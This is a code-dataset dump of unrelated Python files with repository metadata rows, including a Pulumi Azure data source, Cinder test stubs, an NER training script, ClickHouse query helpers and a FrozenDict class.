    dp.register_message_handler(command_start, commands=['start', 'help'])
    dp.register_message_handler(open_command, commands=['Режим_работы'])
    dp.register_message_handler(place_command, commands=['Расположение'])
    dp.register_message_handler(menu_command, commands=['Меню'])
| 42.952381 | 120 | 0.68847 |
7954861510b636e10ce6a09e5f685a906b70f7cc | 362 | py | Python | evaluate.py | SAIC-M/xeval | bf55874aa2028554d42c6f0bf40b15e9233f12a2 | [
"MIT"
] | 3 | 2018-11-06T16:29:53.000Z | 2018-11-06T16:43:16.000Z | evaluate.py | SAIC-M/xeval | bf55874aa2028554d42c6f0bf40b15e9233f12a2 | [
"MIT"
] | null | null | null | evaluate.py | SAIC-M/xeval | bf55874aa2028554d42c6f0bf40b15e9233f12a2 | [
"MIT"
] | null | null | null | import argparse
import json
from xeval.evaluation.utils import run_evaluation
def main():
    """Parse the CLI, load the JSON config file and run the evaluation."""
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument("config", help="Path to config file")
    cli_args = arg_parser.parse_args()
    with open(cli_args.config) as config_file:
        run_evaluation(json.load(config_file))
# Script entry point: run the evaluation described by the CLI-given config.
if __name__ == "__main__":
    main()
| 17.238095 | 61 | 0.687845 |
7954869677c535e7b0ae5b3c63c508b9efd937d4 | 6,504 | py | Python | sdk/python/pulumi_azure_nextgen/network/v20200301/get_express_route_gateway.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/network/v20200301/get_express_route_gateway.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/network/v20200301/get_express_route_gateway.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetExpressRouteGatewayResult',
'AwaitableGetExpressRouteGatewayResult',
'get_express_route_gateway',
]
@pulumi.output_type
class GetExpressRouteGatewayResult:
    """
    ExpressRoute gateway resource.
    """
    # Generated pulumi output type: __init__ validates each field's Python
    # type and stores it via pulumi.set; the @property getters read it back
    # with pulumi.get.
    def __init__(__self__, auto_scale_configuration=None, etag=None, express_route_connections=None, location=None, name=None, provisioning_state=None, tags=None, type=None, virtual_hub=None):
        if auto_scale_configuration and not isinstance(auto_scale_configuration, dict):
            raise TypeError("Expected argument 'auto_scale_configuration' to be a dict")
        pulumi.set(__self__, "auto_scale_configuration", auto_scale_configuration)
        if etag and not isinstance(etag, str):
            raise TypeError("Expected argument 'etag' to be a str")
        pulumi.set(__self__, "etag", etag)
        if express_route_connections and not isinstance(express_route_connections, list):
            raise TypeError("Expected argument 'express_route_connections' to be a list")
        pulumi.set(__self__, "express_route_connections", express_route_connections)
        if location and not isinstance(location, str):
            raise TypeError("Expected argument 'location' to be a str")
        pulumi.set(__self__, "location", location)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if provisioning_state and not isinstance(provisioning_state, str):
            raise TypeError("Expected argument 'provisioning_state' to be a str")
        pulumi.set(__self__, "provisioning_state", provisioning_state)
        if tags and not isinstance(tags, dict):
            raise TypeError("Expected argument 'tags' to be a dict")
        pulumi.set(__self__, "tags", tags)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)
        if virtual_hub and not isinstance(virtual_hub, dict):
            raise TypeError("Expected argument 'virtual_hub' to be a dict")
        pulumi.set(__self__, "virtual_hub", virtual_hub)

    @property
    @pulumi.getter(name="autoScaleConfiguration")
    def auto_scale_configuration(self) -> Optional['outputs.ExpressRouteGatewayPropertiesResponseAutoScaleConfiguration']:
        """
        Configuration for auto scaling.
        """
        return pulumi.get(self, "auto_scale_configuration")

    @property
    @pulumi.getter
    def etag(self) -> str:
        """
        A unique read-only string that changes whenever the resource is updated.
        """
        return pulumi.get(self, "etag")

    @property
    @pulumi.getter(name="expressRouteConnections")
    def express_route_connections(self) -> Sequence['outputs.ExpressRouteConnectionResponse']:
        """
        List of ExpressRoute connections to the ExpressRoute gateway.
        """
        return pulumi.get(self, "express_route_connections")

    @property
    @pulumi.getter
    def location(self) -> Optional[str]:
        """
        Resource location.
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        Resource name.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="provisioningState")
    def provisioning_state(self) -> str:
        """
        The provisioning state of the express route gateway resource.
        """
        return pulumi.get(self, "provisioning_state")

    @property
    @pulumi.getter
    def tags(self) -> Optional[Mapping[str, str]]:
        """
        Resource tags.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Resource type.
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter(name="virtualHub")
    def virtual_hub(self) -> 'outputs.VirtualHubIdResponse':
        """
        The Virtual Hub where the ExpressRoute gateway is or will be deployed.
        """
        return pulumi.get(self, "virtual_hub")
class AwaitableGetExpressRouteGatewayResult(GetExpressRouteGatewayResult):
    """Awaitable wrapper: awaiting it immediately yields a plain result."""
    # pylint: disable=using-constant-test
    def __await__(self):
        # The unreachable `yield` makes __await__ a generator function, which
        # is what makes instances awaitable; the awaited value is the copy
        # returned below.
        if False:
            yield self
        return GetExpressRouteGatewayResult(
            auto_scale_configuration=self.auto_scale_configuration,
            etag=self.etag,
            express_route_connections=self.express_route_connections,
            location=self.location,
            name=self.name,
            provisioning_state=self.provisioning_state,
            tags=self.tags,
            type=self.type,
            virtual_hub=self.virtual_hub)
def get_express_route_gateway(express_route_gateway_name: Optional[str] = None,
                              resource_group_name: Optional[str] = None,
                              opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetExpressRouteGatewayResult:
    """
    Use this data source to access information about an existing resource.

    :param str express_route_gateway_name: The name of the ExpressRoute gateway.
    :param str resource_group_name: The name of the resource group.
    """
    __args__ = dict()
    __args__['expressRouteGatewayName'] = express_route_gateway_name
    __args__['resourceGroupName'] = resource_group_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # invoke the provider-side data source; .value carries the typed result
    __ret__ = pulumi.runtime.invoke('azure-nextgen:network/v20200301:getExpressRouteGateway', __args__, opts=opts, typ=GetExpressRouteGatewayResult).value

    return AwaitableGetExpressRouteGatewayResult(
        auto_scale_configuration=__ret__.auto_scale_configuration,
        etag=__ret__.etag,
        express_route_connections=__ret__.express_route_connections,
        location=__ret__.location,
        name=__ret__.name,
        provisioning_state=__ret__.provisioning_state,
        tags=__ret__.tags,
        type=__ret__.type,
        virtual_hub=__ret__.virtual_hub)
| 38.258824 | 192 | 0.672817 |
795486ad2d13e726547293251d1914aea70a5628 | 4,378 | py | Python | cinder/tests/unit/api/v1/stubs.py | rackerlabs/cinder | 4295ff0a64f781c3546f6c6e0816dbb8100133cb | [
"Apache-2.0"
] | 1 | 2019-02-08T05:24:58.000Z | 2019-02-08T05:24:58.000Z | cinder/tests/unit/api/v1/stubs.py | rackerlabs/cinder | 4295ff0a64f781c3546f6c6e0816dbb8100133cb | [
"Apache-2.0"
] | 1 | 2021-03-21T11:38:29.000Z | 2021-03-21T11:38:29.000Z | cinder/tests/unit/api/v1/stubs.py | rackerlabs/cinder | 4295ff0a64f781c3546f6c6e0816dbb8100133cb | [
"Apache-2.0"
] | 15 | 2017-01-12T10:35:10.000Z | 2019-04-19T08:22:10.000Z | # Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from cinder import exception as exc
# Well-formed (but fake) UUID shared by these API tests.
FAKE_UUID = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
# Mapping of fake UUIDs; empty here — presumably filled lazily by tests.
FAKE_UUIDS = {}
def stub_volume(id, **kwargs):
    """Return a fake volume dict; keyword arguments override the defaults."""
    volume = dict(
        id=id,
        user_id='fakeuser',
        project_id='fakeproject',
        host='fakehost',
        size=1,
        availability_zone='fakeaz',
        attached_mode='rw',
        status='fakestatus',
        migration_status=None,
        attach_status='attached',
        bootable='false',
        name='vol name',
        display_name='displayname',
        display_description='displaydesc',
        created_at=datetime.datetime(1, 1, 1, 1, 1, 1),
        snapshot_id=None,
        source_volid=None,
        volume_type_id='3e196c20-3c06-11e2-81c1-0800200c9a66',
        volume_metadata=[],
        volume_type={'name': 'vol_type_name'},
        volume_attachment=[],
        multiattach=False,
        readonly='False',
    )
    volume.update(kwargs)
    return volume
def stub_volume_create(self, context, size, name, description, snapshot,
                       **param):
    """Stub for volume create: echo the requested attributes on a fake volume."""
    try:
        snapshot_id = snapshot['id']
    except (KeyError, TypeError):
        snapshot_id = None
    vol = stub_volume('1')
    vol.update({
        'size': size,
        'display_name': name,
        'display_description': description,
        'source_volid': None,
        'snapshot_id': snapshot_id,
        'availability_zone': param.get('availability_zone', 'fakeaz'),
    })
    return vol
def stub_volume_create_from_image(self, context, size, name, description,
                                  snapshot, volume_type, metadata,
                                  availability_zone):
    """Stub for image-based volume create: fake volume stuck in 'creating'."""
    overrides = {
        'status': 'creating',
        'size': size,
        'display_name': name,
        'display_description': description,
        'availability_zone': 'cinder',
    }
    vol = stub_volume('1')
    vol.update(overrides)
    return vol
def stub_volume_update(self, context, *args, **param):
    """No-op stand-in for the volume update API."""
    pass
def stub_volume_delete(self, context, *args, **param):
    """No-op stand-in for the volume delete API."""
    pass
def stub_volume_get(self, context, volume_id):
    """Return a fake volume with the requested id."""
    return stub_volume(volume_id)
def stub_volume_get_notfound(self, context, volume_id):
    """Stand-in for a lookup of a non-existent volume: always raises NotFound."""
    raise exc.NotFound
def stub_volume_get_all(context, search_opts=None):
return [stub_volume(100, project_id='fake'),
stub_volume(101, project_id='superfake'),
stub_volume(102, project_id='superduperfake')]
def stub_volume_get_all_by_project(self, context, search_opts=None):
return [stub_volume_get(self, context, '1')]
def stub_snapshot(id, **kwargs):
snapshot = {'id': id,
'volume_id': 12,
'status': 'available',
'volume_size': 100,
'created_at': None,
'display_name': 'Default name',
'display_description': 'Default description',
'project_id': 'fake',
'snapshot_metadata': []}
snapshot.update(kwargs)
return snapshot
def stub_snapshot_get_all(context, filters=None, marker=None, limit=None,
sort_keys=None, sort_dirs=None, offset=None):
return [stub_snapshot(100, project_id='fake'),
stub_snapshot(101, project_id='superfake'),
stub_snapshot(102, project_id='superduperfake')]
def stub_snapshot_get_all_by_project(context, project_id, filters=None,
marker=None, limit=None, sort_keys=None,
sort_dirs=None, offset=None):
return [stub_snapshot(1)]
def stub_snapshot_update(self, context, *args, **param):
pass
def stub_service_get_all_by_topic(context, topic, disabled=None):
return [{'availability_zone': "zone1:host1", "disabled": 0}]
| 31.049645 | 78 | 0.624486 |
7954888bb3db3ac4ba9dc45e1f2b98e4f3e441db | 4,137 | py | Python | main.py | monologg/CNN-BiLSTM-CRF-NER | 140b23eb5f583050dc39c9648028115ba4b75f09 | [
"Apache-2.0"
] | 16 | 2020-03-22T08:20:42.000Z | 2022-03-16T03:59:40.000Z | main.py | monologg/CNN-BiLSTM-CRF-NER | 140b23eb5f583050dc39c9648028115ba4b75f09 | [
"Apache-2.0"
] | null | null | null | main.py | monologg/CNN-BiLSTM-CRF-NER | 140b23eb5f583050dc39c9648028115ba4b75f09 | [
"Apache-2.0"
] | 8 | 2020-11-23T11:00:12.000Z | 2022-03-31T03:03:54.000Z | import argparse
from trainer import Trainer
from utils import init_logger, build_vocab, download_w2v
from data_loader import load_examples
def main(args):
init_logger()
if not args.no_w2v:
download_w2v(args)
build_vocab(args)
train_dataset = load_examples(args, mode="train")
dev_dataset = None
test_dataset = load_examples(args, mode="test")
trainer = Trainer(args, train_dataset, dev_dataset, test_dataset)
if args.do_train:
trainer.train()
if args.do_eval:
trainer.load_model()
trainer.evaluate("test", "eval")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--data_dir", default="./data", type=str, help="The input data dir")
parser.add_argument("--model_dir", default="./model", type=str, help="Path for saving model")
parser.add_argument("--wordvec_dir", default="./wordvec", type=str, help="Path for pretrained word vector")
parser.add_argument("--vocab_dir", default="./vocab", type=str)
parser.add_argument("--pred_dir", default="./preds", type=str, help="The prediction file dir")
parser.add_argument("--train_file", default="train.tsv", type=str, help="Train file")
parser.add_argument("--test_file", default="test.tsv", type=str, help="Test file")
parser.add_argument("--label_file", default="label.txt", type=str, help="Label file")
parser.add_argument("--w2v_file", default="word_vector_300d.vec", type=str, help="Pretrained word vector file")
parser.add_argument("--write_pred", action="store_true", help="Write prediction during evaluation")
parser.add_argument("--max_seq_len", default=50, type=int, help="Max sentence length")
parser.add_argument("--max_word_len", default=10, type=int, help="Max word length")
parser.add_argument("--word_vocab_size", default=100000, type=int, help="Maximum size of word vocabulary")
parser.add_argument("--char_vocab_size", default=1000, type=int, help="Maximum size of character vocabulary")
parser.add_argument("--word_emb_dim", default=300, type=int, help="Word embedding size")
parser.add_argument("--char_emb_dim", default=30, type=int, help="Character embedding size")
parser.add_argument("--final_char_dim", default=50, type=int, help="Dimension of character cnn output")
parser.add_argument("--hidden_dim", default=350, type=int, help="Dimension of BiLSTM output")
parser.add_argument("--kernel_lst", default="2,3,4", type=str, help="kernel size for character cnn")
parser.add_argument("--num_filters", default=32, type=int, help=" Number of filters for character cnn")
parser.add_argument('--seed', type=int, default=42, help="random seed for initialization")
parser.add_argument("--train_batch_size", default=64, type=int, help="Batch size for training")
parser.add_argument("--eval_batch_size", default=128, type=int, help="Batch size for evaluation")
parser.add_argument("--learning_rate", default=0.005, type=float, help="The initial learning rate")
parser.add_argument("--num_train_epochs", default=15.0, type=float, help="Total number of training epochs to perform.")
parser.add_argument("--slot_pad_label", default="PAD", type=str, help="Pad token for slot label pad (to be ignore when calculate loss)")
parser.add_argument("--ignore_index", default=0, type=int,
help='Specifies a target value that is ignored and does not contribute to the input gradient')
parser.add_argument('--logging_steps', type=int, default=1200, help="Log every X updates steps.")
parser.add_argument('--save_steps', type=int, default=1200, help="Save checkpoint every X updates steps.")
parser.add_argument("--do_train", action="store_true", help="Whether to run training.")
parser.add_argument("--do_eval", action="store_true", help="Whether to run eval on the test set.")
parser.add_argument("--no_cuda", action="store_true", help="Avoid using CUDA when available")
parser.add_argument("--no_w2v", action="store_true", help="Not loading pretrained word vector")
args = parser.parse_args()
main(args)
| 54.434211 | 140 | 0.716945 |
795488bdd91b94873278d8d304ecd7aa2951f2b4 | 875 | py | Python | backend/api/btb/api/schema/resolvers/company_by_id.py | serben/project-c | af7d5815fbf6d427b0f414338cee060b0b04ab65 | [
"MIT"
] | 4 | 2020-04-30T16:11:24.000Z | 2020-06-02T10:08:07.000Z | backend/api/btb/api/schema/resolvers/company_by_id.py | serben/project-c | af7d5815fbf6d427b0f414338cee060b0b04ab65 | [
"MIT"
] | 291 | 2020-04-20T13:11:13.000Z | 2022-02-10T21:54:46.000Z | backend/api/btb/api/schema/resolvers/company_by_id.py | serben/project-c | af7d5815fbf6d427b0f414338cee060b0b04ab65 | [
"MIT"
] | 2 | 2020-04-19T14:56:01.000Z | 2020-04-19T18:09:34.000Z | from graphene import ID, String, ObjectType
from btb.api.models import db
from sqlalchemy import text
from promise import Promise
from promise.dataloader import DataLoader
from flask import current_app, g
class CompanyLoader(DataLoader):
def batch_load_fn(self, keys):
current_app.logger.debug("load %s", keys)
with db.engine.begin() as conn:
sql = text("select * from btb.company_with_contact where id = any(cast(:keys as uuid[]))")
data = conn.execute(sql, keys=keys)
d = {str(i["id"]): i for i in data}
# must return result in same order
return Promise.resolve([d.get(str(id), None) for id in keys])
def company_by_id(root, info, id=None):
id = root["company_id"] if id is None else id
current_app.logger.debug("load %s", id)
return g.company_loader.load(id)
| 30.172414 | 102 | 0.657143 |
795488f529310ef95820f937390a2a41c5a29d6b | 2,465 | py | Python | nova/cert/manager.py | vmthunder/nova | baf05caab705c5778348d9f275dc541747b7c2de | [
"Apache-2.0"
] | 7 | 2015-09-22T11:27:16.000Z | 2015-11-02T12:33:46.000Z | nova/cert/manager.py | vmthunder/nova | baf05caab705c5778348d9f275dc541747b7c2de | [
"Apache-2.0"
] | 9 | 2015-05-20T11:20:17.000Z | 2017-07-27T08:21:33.000Z | nova/cert/manager.py | vmthunder/nova | baf05caab705c5778348d9f275dc541747b7c2de | [
"Apache-2.0"
] | 13 | 2015-05-05T09:34:04.000Z | 2017-11-08T02:03:46.000Z | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Cert manager manages x509 certificates.
**Related Flags**
:cert_topic: What :mod:`rpc` topic to listen to (default: `cert`).
:cert_manager: The module name of a class derived from
:class:`manager.Manager` (default:
:class:`nova.cert.manager.Manager`).
"""
import base64
from oslo import messaging
from nova import crypto
from nova import manager
class CertManager(manager.Manager):
target = messaging.Target(version='2.0')
def __init__(self, *args, **kwargs):
super(CertManager, self).__init__(service_name='cert',
*args, **kwargs)
def init_host(self):
crypto.ensure_ca_filesystem()
def revoke_certs_by_user(self, context, user_id):
"""Revoke all user certs."""
return crypto.revoke_certs_by_user(user_id)
def revoke_certs_by_project(self, context, project_id):
"""Revoke all project certs."""
return crypto.revoke_certs_by_project(project_id)
def revoke_certs_by_user_and_project(self, context, user_id, project_id):
"""Revoke certs for user in project."""
return crypto.revoke_certs_by_user_and_project(user_id, project_id)
def generate_x509_cert(self, context, user_id, project_id):
"""Generate and sign a cert for user in project."""
return crypto.generate_x509_cert(user_id, project_id)
def fetch_ca(self, context, project_id):
"""Get root ca for a project."""
return crypto.fetch_ca(project_id)
def fetch_crl(self, context, project_id):
"""Get crl for a project."""
return crypto.fetch_crl(project_id)
def decrypt_text(self, context, project_id, text):
"""Decrypt base64 encoded text using the projects private key."""
return crypto.decrypt_text(project_id, base64.b64decode(text))
| 34.71831 | 78 | 0.687221 |
795489bccac3aa363244ac1ebc6cf358d09d1379 | 801 | py | Python | migrations/versions/9a1c299f53be_adding_role.py | oodennis20/Blogs | 074338a69db1d759eb9050138c99b8abbb492cd2 | [
"MIT"
] | null | null | null | migrations/versions/9a1c299f53be_adding_role.py | oodennis20/Blogs | 074338a69db1d759eb9050138c99b8abbb492cd2 | [
"MIT"
] | null | null | null | migrations/versions/9a1c299f53be_adding_role.py | oodennis20/Blogs | 074338a69db1d759eb9050138c99b8abbb492cd2 | [
"MIT"
] | 1 | 2019-12-06T05:05:44.000Z | 2019-12-06T05:05:44.000Z | """adding role
Revision ID: 9a1c299f53be
Revises: f4ae7abcdaa4
Create Date: 2019-12-01 09:02:51.067454
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '9a1c299f53be'
down_revision = 'f4ae7abcdaa4'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('blogs', sa.Column('content', sa.String(length=255), nullable=True))
op.drop_column('blogs', 'blog')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('blogs', sa.Column('blog', sa.VARCHAR(length=255), autoincrement=False, nullable=True))
op.drop_column('blogs', 'content')
# ### end Alembic commands ###
| 25.83871 | 105 | 0.692884 |
795489cf7a20bb5caa99f3a97df23e37e35ac3a2 | 2,291 | py | Python | ee/clickhouse/models/util.py | zegl/posthog | 62846fd565e9eb6ff299bb81dd3b91f219bd0eeb | [
"MIT"
] | 1 | 2020-12-08T04:04:52.000Z | 2020-12-08T04:04:52.000Z | ee/clickhouse/models/util.py | zegl/posthog | 62846fd565e9eb6ff299bb81dd3b91f219bd0eeb | [
"MIT"
] | null | null | null | ee/clickhouse/models/util.py | zegl/posthog | 62846fd565e9eb6ff299bb81dd3b91f219bd0eeb | [
"MIT"
] | null | null | null | import json
from typing import Optional, Union
import pytz
from dateutil.parser import isoparse
from django.utils import timezone
from posthog.models.property import Property
def get_operator(prop: Property, arg: str):
operator = prop.operator
if operator == "is_not":
return "(trim(BOTH '\"' FROM ep.value) = %({})s)".format(arg), prop.value
elif operator == "icontains" or operator == "not_icontains":
value = "%{}%".format(prop.value)
return "(trim(BOTH '\"' FROM ep.value) LIKE %({})s)".format(arg), value
elif operator == "regex" or operator == "not_regex":
return "match(trim(BOTH '\"' FROM ep.value), %({})s)".format(arg), prop.value
elif operator == "is_set":
return "", prop.value
elif operator == "is_not_set":
return "", prop.value
elif operator == "gt":
return (
"(toInt64(trim(BOTH '\"' FROM ep.value)) > %({})s)".format(arg),
prop.value,
)
elif operator == "lt":
return (
"(toInt64(trim(BOTH '\"' FROM ep.value)) < %({})s)".format(arg),
prop.value,
)
else:
if is_json(prop.value):
return (
"replaceRegexpAll(trim(BOTH '\"' FROM ep.value),' ', '') = replaceRegexpAll(toString(%({})s),' ', '')".format(
arg
),
prop.value,
)
else:
return (
"(trim(BOTH '\"' FROM ep.value) = toString(%({})s))".format(arg),
prop.value,
)
def is_json(val):
if isinstance(val, int):
return False
try:
json.loads(val)
except ValueError:
return False
return True
def is_int(value: Optional[Union[str, int]]) -> bool:
try:
int(value) # type: ignore
except (ValueError, TypeError):
return False
else:
return True
def cast_timestamp_or_now(timestamp: Optional[Union[timezone.datetime, str]]) -> str:
if not timestamp:
timestamp = timezone.now()
# clickhouse specific formatting
if isinstance(timestamp, str):
timestamp = isoparse(timestamp)
else:
timestamp = timestamp.astimezone(pytz.utc)
return timestamp.strftime("%Y-%m-%d %H:%M:%S.%f")
| 28.283951 | 126 | 0.55347 |
79548a16e042f2aa938ddd2f709a78ec6e09d678 | 467 | py | Python | src/dashboard/settings.py | karlicoss/dashboard | 708eb183130de31e344fa0f38fa8ae74d1953e31 | [
"MIT"
] | 13 | 2020-08-26T06:25:00.000Z | 2021-07-23T13:54:19.000Z | src/dashboard/settings.py | karlicoss/dashboard | 708eb183130de31e344fa0f38fa8ae74d1953e31 | [
"MIT"
] | null | null | null | src/dashboard/settings.py | karlicoss/dashboard | 708eb183130de31e344fa0f38fa8ae74d1953e31 | [
"MIT"
] | null | null | null | from bokeh.themes import Theme
# https://docs.bokeh.org/en/latest/docs/reference/themes.html
# eh. kind of crappy (I'd much rather prefer python native way of overriding), but at least it works
# Legend.location.property._default = 'top_left' -- didn't work
theme = Theme(json={
'attrs' : {
'Legend': {
'location' : 'top_left',
'orientation' : 'horizontal',
'click_policy': 'hide', # todo 'mute'?
}
}
})
| 33.357143 | 100 | 0.605996 |
79548abfa8ee2ee90425119d3ed259d2e61d908f | 7,897 | py | Python | pyfda/frozendict.py | toddrme2178/pyfda | c20355fb36ace6902aebd1a6bc6c1a71771b84f4 | [
"MIT"
] | 1 | 2019-04-28T15:50:55.000Z | 2019-04-28T15:50:55.000Z | pyfda/frozendict.py | toddrme2178/pyfda | c20355fb36ace6902aebd1a6bc6c1a71771b84f4 | [
"MIT"
] | null | null | null | pyfda/frozendict.py | toddrme2178/pyfda | c20355fb36ace6902aebd1a6bc6c1a71771b84f4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of the pyFDA project hosted at https://github.com/chipmuenk/pyfda
#
# Copyright © pyFDA Project Contributors
# Licensed under the terms of the MIT License
# (see file LICENSE in root directory for details)
"""
Create an immutable dictionary for the filter tree. The eliminates the risk
that a filter design routine inadvertedly modifies the dict e.g. via
a shallow copy. Used by filterbroker.py and filter_tree_builder.py
Taken from http://stackoverflow.com/questions/2703599/what-would-a-frozen-dict-be
"""
if 3 / 2 == 1:
version = 2
else:
version = 3
def col(i):
''' For binding named attributes to spots inside subclasses of tuple.'''
g = tuple.__getitem__
@property
def _col(self):
return g(self,i)
return _col
#--------------------------------------------------------------------------
def freeze_hierarchical(hier_dict):
"""
Return the argumenent as a FrozenDict where all nested dicts have also been
converted to FrozenDicts recursively. When the argument is not a dict,
return the argument unchanged.
"""
if isinstance(hier_dict, dict):
for k in hier_dict:
if isinstance(hier_dict[k], dict):
hier_dict[k] = freeze_hierarchical(hier_dict[k])
return FrozenDict(hier_dict)
else:
return(hier_dict)
class Item(tuple):
''' Designed for storing key-value pairs inside
a FrozenDict, which itself is a subclass of frozenset.
The __hash__ is overloaded to return the hash of only the key.
__eq__ is overloaded so that normally it only checks whether the Item's
key is equal to the other object, HOWEVER, if the other object itself
is an instance of Item, it checks BOTH the key and value for equality.
WARNING: Do not use this class for any purpose other than to contain
key value pairs inside FrozenDict!!!!
The __eq__ operator is overloaded in such a way that it violates a
fundamental property of mathematics. That property, which says that
a == b and b == c implies a == c, does not hold for this object.
Here's a demonstration:
[in] >>> x = Item(('a',4))
[in] >>> y = Item(('a',5))
[in] >>> hash('a')
[out] >>> 194817700
[in] >>> hash(x)
[out] >>> 194817700
[in] >>> hash(y)
[out] >>> 194817700
[in] >>> 'a' == x
[out] >>> True
[in] >>> 'a' == y
[out] >>> True
[in] >>> x == y
[out] >>> False
'''
__slots__ = ()
key, value = col(0), col(1)
def __hash__(self):
return hash(self.key)
def __eq__(self, other):
if isinstance(other, Item):
return tuple.__eq__(self, other)
return self.key == other
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return '%r: %r' % self
def __repr__(self):
return 'Item((%r, %r))' % self
class FrozenDict(frozenset):
''' Behaves in most ways like a regular dictionary, except that it's immutable.
It differs from other implementations because it doesn't subclass "dict".
Instead it subclasses "frozenset" which guarantees immutability.
FrozenDict instances are created with the same arguments used to initialize
regular dictionaries, and has all the same methods.
[in] >>> f = FrozenDict(x=3,y=4,z=5)
[in] >>> f['x']
[out] >>> 3
[in] >>> f['a'] = 0
[out] >>> TypeError: 'FrozenDict' object does not support item assignment
FrozenDict can accept un-hashable values, but FrozenDict is only hashable if its values are hashable.
[in] >>> f = FrozenDict(x=3,y=4,z=5)
[in] >>> hash(f)
[out] >>> 646626455
[in] >>> g = FrozenDict(x=3,y=4,z=[])
[in] >>> hash(g)
[out] >>> TypeError: unhashable type: 'list'
FrozenDict interacts with dictionary objects as though it were a dict itself.
[in] >>> original = dict(x=3,y=4,z=5)
[in] >>> frozen = FrozenDict(x=3,y=4,z=5)
[in] >>> original == frozen
[out] >>> True
FrozenDict supports bi-directional conversions with regular dictionaries.
[in] >>> original = {'x': 3, 'y': 4, 'z': 5}
[in] >>> FrozenDict(original)
[out] >>> FrozenDict({'x': 3, 'y': 4, 'z': 5})
[in] >>> dict(FrozenDict(original))
[out] >>> {'x': 3, 'y': 4, 'z': 5} '''
__slots__ = ()
def __new__(cls, orig={}, **kw):
if kw:
d = dict(orig, **kw)
items = map(Item, d.items())
else:
try:
items = map(Item, orig.items())
except AttributeError:
items = map(Item, orig)
return frozenset.__new__(cls, items)
def __repr__(self):
cls = self.__class__.__name__
items = frozenset.__iter__(self)
_repr = ', '.join(map(str,items))
return '%s({%s})' % (cls, _repr)
def __getitem__(self, key):
if key not in self:
raise KeyError(key)
diff = self.difference
item = diff(diff({key}))
key, value = set(item).pop()
return value
def get(self, key, default=None):
if key not in self:
return default
return self[key]
def __iter__(self):
items = frozenset.__iter__(self)
return map(lambda i: i.key, items)
def keys(self):
items = frozenset.__iter__(self)
return map(lambda i: i.key, items)
def values(self):
items = frozenset.__iter__(self)
return map(lambda i: i.value, items)
def items(self):
items = frozenset.__iter__(self)
return map(tuple, items)
def copy(self):
cls = self.__class__
items = frozenset.copy(self)
dupl = frozenset.__new__(cls, items)
return dupl
@classmethod
def fromkeys(cls, keys, value):
d = dict.fromkeys(keys,value)
return cls(d)
def __hash__(self):
kv = tuple.__hash__
items = frozenset.__iter__(self)
return hash(frozenset(map(kv, items)))
def __eq__(self, other):
if not isinstance(other, FrozenDict):
try:
other = FrozenDict(other)
except Exception:
return False
return frozenset.__eq__(self, other)
def __ne__(self, other):
return not self.__eq__(other)
if version == 2:
#Here are the Python2 modifications
class Python2(FrozenDict):
def __iter__(self):
items = frozenset.__iter__(self)
for i in items:
yield i.key
def iterkeys(self):
items = frozenset.__iter__(self)
for i in items:
yield i.key
def itervalues(self):
items = frozenset.__iter__(self)
for i in items:
yield i.value
def iteritems(self):
items = frozenset.__iter__(self)
for i in items:
yield (i.key, i.value)
def has_key(self, key):
return key in self
def viewkeys(self):
return dict(self).viewkeys()
def viewvalues(self):
return dict(self).viewvalues()
def viewitems(self):
return dict(self).viewitems()
#If this is Python2, rebuild the class
#from scratch rather than use a subclass
py3 = FrozenDict.__dict__
py3 = {k: py3[k] for k in py3}
py2 = {}
py2.update(py3)
dct = Python2.__dict__
py2.update({k: dct[k] for k in dct})
FrozenDict = type('FrozenDict', (frozenset,), py2) | 32.364754 | 109 | 0.559959 |
79548b3a3835c0086447f8255cc110ef6cdbe50a | 1,783 | py | Python | project_1/pentest/vuln2.py | BFreitas16/SSof | c6963b76c1c033324593a40139e5918ad6386380 | [
